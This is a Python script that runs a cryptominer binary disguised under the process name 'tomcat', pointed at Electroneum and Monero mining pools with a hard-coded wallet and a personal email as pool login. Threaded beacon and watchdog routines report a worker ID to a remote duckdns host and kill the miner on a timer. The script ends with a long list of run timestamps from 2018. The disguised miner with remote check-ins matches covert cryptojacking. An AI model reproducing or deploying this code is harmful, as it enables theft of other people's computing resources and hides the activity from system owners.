import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:26:05.206471
#2018-02-17 17:14:03.990671
#2018-02-17 19:02:03.778655
#2018-02-17 20:51:03.957194
#2018-02-17 22:38:01.932947
#2018-02-18 00:22:03.905783
#2018-02-18 02:13:05.098501
#2018-02-18 04:00:07.131264
#2018-02-18 05:49:06.306306
#2018-02-18 07:41:06.247311
#2018-02-18 09:28:06.216553
#2018-02-18 11:14:04.095099
#2018-02-18 13:01:06.931465
#2018-02-18 14:49:03.586445
#2018-02-18 16:37:05.404210
#2018-02-18 18:26:04.010657
#2018-02-18 20:13:03.739871
#2018-02-18 21:58:03.612259
#2018-02-18 23:47:06.224029
#2018-02-19 01:32:05.374657
#2018-02-19 03:20:03.187564
#2018-02-19 05:05:05.763349
#2018-02-19 06:51:01.643064
#2018-02-19 08:40:01.480077
#2018-02-19 10:29:04.899196
#2018-02-19 12:16:09.870013
#2018-02-19 14:05:07.325014
#2018-02-19 15:55:09.920426
#2018-02-19 17:42:07.835628
#2018-02-19 19:29:07.180041
#2018-02-19 21:16:05.256004
#2018-02-19 23:02:04.048701
#2018-02-20 00:47:05.461858
#2018-02-20 02:37:06.821886
#2018-02-20 04:26:06.351906
#2018-02-20 06:09:07.363682
#2018-02-20 07:55:07.482476
#2018-02-20 09:41:05.575850
#2018-02-20 11:25:06.780230
#2018-02-20 13:13:06.755627
#2018-02-20 14:58:09.315694
#2018-02-20 16:43:11.189066
#2018-02-20 18:31:07.433618
#2018-02-20 20:22:01.631406
#2018-02-20 22:07:06.217411
#2018-02-20 23:49:04.485366
#2018-02-21 01:33:06.204823
#2018-02-21 03:20:09.143100
#2018-02-21 05:09:07.221870
#2018-02-21 06:57:01.618897
#2018-02-21 08:44:16.242192
#2018-02-21 10:32:01.347179
#2018-02-21 12:19:01.479537
#2018-02-21 14:06:09.760662
#2018-02-21 15:52:12.185107
#2018-02-21 17:43:09.580759
#2018-02-21 19:28:07.134209
#2018-02-21 21:18:08.044216
#2018-02-21 23:04:07.516296
#2018-02-22 00:51:05.863639
#2018-02-22 02:40:08.882860
#2018-02-22 04:28:06.156112
#2018-02-22 06:15:03.614516
#2018-02-22 08:01:02.045484
#2018-02-22 09:49:05.045810
#2018-02-22 11:33:02.099530
#2018-02-22 13:19:08.037799
#2018-02-22 15:09:05.525658
#2018-02-22 16:52:08.427218
#2018-02-22 18:41:06.106263
#2018-02-22 20:34:04.357176
#2018-02-22 22:19:01.500900
#2018-02-23 00:05:08.008038
#2018-02-23 01:53:02.240196
#2018-02-23 03:42:05.278781
#2018-02-23 05:27:03.278752
#2018-02-23 07:13:05.850343
#2018-02-23 09:18:07.529740
#2018-02-23 11:25:06.154898
#2018-02-23 13:16:04.341698
#2018-02-23 15:01:01.579012
#2018-02-23 16:48:06.023658
#2018-02-23 18:32:09.527980
#2018-02-23 20:21:04.656593
#2018-02-23 22:08:02.155732
#2018-02-23 23:56:08.352525
#2018-02-24 01:46:06.425972
#2018-02-24 03:40:05.182331
#2018-02-24 05:23:06.938286
#2018-02-24 07:11:04.319926
#2018-02-24 09:00:07.953538
#2018-02-24 11:01:07.388864
#2018-02-24 12:49:04.470231
#2018-02-24 14:38:07.782235
#2018-02-24 16:29:04.308947
#2018-02-24 18:20:07.077246
#2018-02-24 20:06:05.783156
#2018-02-24 21:48:07.514934
#2018-02-25 00:49:07.336430
#2018-02-25 03:51:06.460177
#2018-02-25 07:25:03.594511